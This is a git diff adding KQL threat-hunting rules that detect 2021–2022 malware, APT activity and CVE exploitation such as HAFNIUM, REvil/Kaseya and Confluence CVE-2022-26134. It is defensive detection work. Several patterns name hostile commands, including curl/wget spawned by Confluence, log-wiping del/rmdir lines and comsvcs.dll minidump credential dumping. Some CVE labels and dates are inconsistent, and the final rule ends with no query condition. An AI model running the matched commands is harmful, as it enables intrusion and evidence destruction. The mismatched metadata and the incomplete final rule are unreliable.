diff --git a/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql
new file mode 100644
index 00000000..51270f60
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential Devil Bait Related Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\" and (FolderPath endswith ".txt" or FolderPath endswith ".xml")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql
new file mode 100644
index 00000000..671f391a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql
@@ -0,0 +1,12 @@
+// Title: FoggyWeb Backdoor DLL Loading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-27
+// Level: critical
+// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\ADFS\\version.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql
new file mode 100644
index 00000000..50561a0f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql
@@ -0,0 +1,12 @@
+// Title: Goofy Guineapig Backdoor IOC
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects malicious indicators seen used by the Goofy Guineapig malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath in~ ("C:\\ProgramData\\GoogleUpdate\\config.dat", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat", "C:\\ProgramData\\GoogleUpdate\\goopdate.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql
new file mode 100644
index 00000000..afea09da
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Goofy Guineapig Backdoor Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "choice /t %d /d y /n >nul"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
new file mode 100644
index 00000000..52be6fd3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\GoogleUpdate.exe" and InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe") and (not(((FolderPath startswith "C:\\Program Files\\Google\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\") or FolderPath contains "\\AppData\\Local\\Google\\Update\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql
new file mode 100644
index 00000000..f7bf0450
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql
@@ -0,0 +1,10 @@
+// Title: Moriya Rootkit File Created
+// Author: Bhabesh Raj
+// Date: 2021-05-06
+// Level: critical
+// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql
new file mode 100644
index 00000000..26388339
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential NetWire RAT Activity - Registry
+// Author: Christopher Peacock
+// Date: 2021-10-07
+// Level: high
+// Description: Detects registry keys related to NetWire RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\software\\NetWire"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql
new file mode 100644
index 00000000..f6d934a8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "config" and ProcessCommandLine contains "msdtc" and ProcessCommandLine contains "start" and ProcessCommandLine contains "auto") and InitiatingProcessFolderPath endswith "\\updata.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql
new file mode 100644
index 00000000..59429104
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor DLL Loading Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\oci.dll" and InitiatingProcessFolderPath endswith "\\msdtc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql
new file mode 100644
index 00000000..5a1d7091
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Pingback Backdoor File Indicators
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "updata.exe" and FolderPath =~ "C:\\Windows\\oci.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql
new file mode 100644
index 00000000..8c269693
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware CommandLine Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith ".exe Platypus"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql
new file mode 100644
index 00000000..c836847d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware File Indicator Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "Microsift" and ((FolderPath contains "\\Roaming\\" or FolderPath contains "\\Local\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\"))) or FolderPath endswith "\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql
new file mode 100644
index 00000000..bec70afe
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware Registry Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*" and (RegistryKey contains "Microsift" or RegistryValueData contains ".exe Platypus")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql
new file mode 100644
index 00000000..1e7b3461
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql
@@ -0,0 +1,12 @@
+// Title: HAFNIUM Exchange Exploitation Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-09
+// Level: critical
+// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -t7z " and ProcessCommandLine contains "C:\\Programdata\\pst" and ProcessCommandLine contains "\\it.zip") or (ProcessCommandLine contains "attrib" and ProcessCommandLine contains " +h " and ProcessCommandLine contains " +s " and ProcessCommandLine contains " +r " and ProcessCommandLine contains ".aspx") or ((ProcessCommandLine contains "inetpub\\wwwroot\\" and ProcessCommandLine contains ".dmp.zip") and FolderPath endswith "\\makecab.exe") or ((ProcessCommandLine contains "Microsoft\\Exchange Server\\" or ProcessCommandLine contains "compressionmemory" or ProcessCommandLine contains ".gif") and FolderPath endswith "\\makecab.exe") or (FolderPath endswith "Opera_browser.exe" and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")) or FolderPath endswith "Users\\Public\\opera\\Opera_browser.exe" or (ProcessCommandLine contains "Windows\\Temp\\xx.bat" or ProcessCommandLine contains "Windows\\WwanSvcdcs" or ProcessCommandLine contains "Windows\\Temp\\cw.exe") or (ProcessCommandLine contains "\\comsvcs.dll" and ProcessCommandLine contains "Minidump" and ProcessCommandLine contains "full " and ProcessCommandLine contains "\\inetpub\\wwwroot") or (FolderPath contains "\\ProgramData\\VSPerfMon\\" or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "VSPerfMon")) or (ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "Temp\\__output")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql
new file mode 100644
index 00000000..869f074e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql
@@ -0,0 +1,10 @@
+// Title: REvil Kaseya Incident Malware Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-03
+// Level: critical
+// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\Windows\\cert.exe" or ProcessCommandLine contains "del /q /f c:\\kworking\\agent.crt" or ProcessCommandLine contains "Kaseya VSA Agent Hot-fix" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\MsMpEng.exe" or ProcessCommandLine contains "rmdir /s /q %SystemDrive%\\inetpub\\logs" or (ProcessCommandLine contains "del /s /q /f %SystemDrive%\\" and ProcessCommandLine contains ".log") or ProcessCommandLine contains "c:\\kworking1\\agent.exe" or ProcessCommandLine contains "c:\\kworking1\\agent.crt") or (FolderPath in~ ("C:\\Windows\\MsMpEng.exe", "C:\\Windows\\cert.exe", "C:\\kworking\\agent.exe", "C:\\kworking1\\agent.exe")) or (ProcessCommandLine contains "del /s /q /f" and ProcessCommandLine contains "WebPages\\Errors\\webErrorLog.txt")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql
new file mode 100644
index 00000000..18e571bf
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql
@@ -0,0 +1,12 @@
+// Title: APT PRIVATELOG Image Load Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-07
+// Level: high
+// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats
+// False Positives:
+//   - Rarely observed
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\clfsw32.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql
new file mode 100644
index 00000000..04ffdd6d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql
@@ -0,0 +1,10 @@
+// Title: SOURGUM Actor Behaviours
+// Author: MSTIC, FPT.EagleEye
+// Date: 2021-06-15
+// Level: high
+// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
+// MITRE Tactic: Persistence
+// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath contains "windows\\system32\\Physmem.sys" or FolderPath contains "Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini") or ((ProcessCommandLine contains "reg add" and (FolderPath contains "windows\\system32\\filepath2" or FolderPath contains "windows\\system32\\ime")) and (ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32" or ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql
new file mode 100644
index 00000000..8dc33cc3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-21554 QueueJumper Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-12
+// Level: high
+// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\Windows\\System32\\mqsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
new file mode 100644
index 00000000..6f8a15bb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
+// Author: @kostastsale
+// Date: 2022-04-25
+// Level: medium
+// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
+// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats
+// False Positives:
+//   - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\prunsrv.exe" and ((ProcessCommandLine contains "/c powershell" and FolderPath endswith "\\cmd.exe") or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql
new file mode 100644
index 00000000..997cc9fa
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2022-24527 Microsoft Connected Cache LPE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1" and (not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql
new file mode 100644
index 00000000..a7410f63
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql
@@ -0,0 +1,10 @@
+// Title: Atlassian Confluence CVE-2022-26134
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" and InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql
new file mode 100644
index 00000000..3249ce87
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2022-26809 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats
+// False Positives:
+//   - Some cases in which the service spawned a werfault.exe process
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "-k RPCSS" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql
new file mode 100644
index 00000000..cd3ae4cf
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2022-29072 Exploitation Attempt
+// Author: frack113, @kostastsale
+// Date: 2022-04-17
+// Level: high
+// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
+// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
+// The command runs in a child process under the 7zFM.exe process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2022-29072, detection.emerging-threats
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\7zFM.exe") and (not((((ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r ") or (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".cmd" or ProcessCommandLine endswith ".ps1")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
new file mode 100644
index 00000000..442fa855
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
+// Author: Sittikorn S
+// Date: 2020-05-31
+// Level: medium
+// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql
new file mode 100644
index 00000000..70a91bea
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql
@@ -0,0 +1,12 @@
+// Title: Apache Spark Shell Command Injection - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-20
+// Level: high
+// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "id -Gn `" or ProcessCommandLine contains "id -Gn '") and InitiatingProcessFolderPath endswith "\\bash"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql
new file mode 100644
index 00000000..d9d5c139
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Sysmon as Execution Parent
+// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
+// Date: 2022-11-10
+// Level: high
+// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats
+
+DeviceProcessEvents
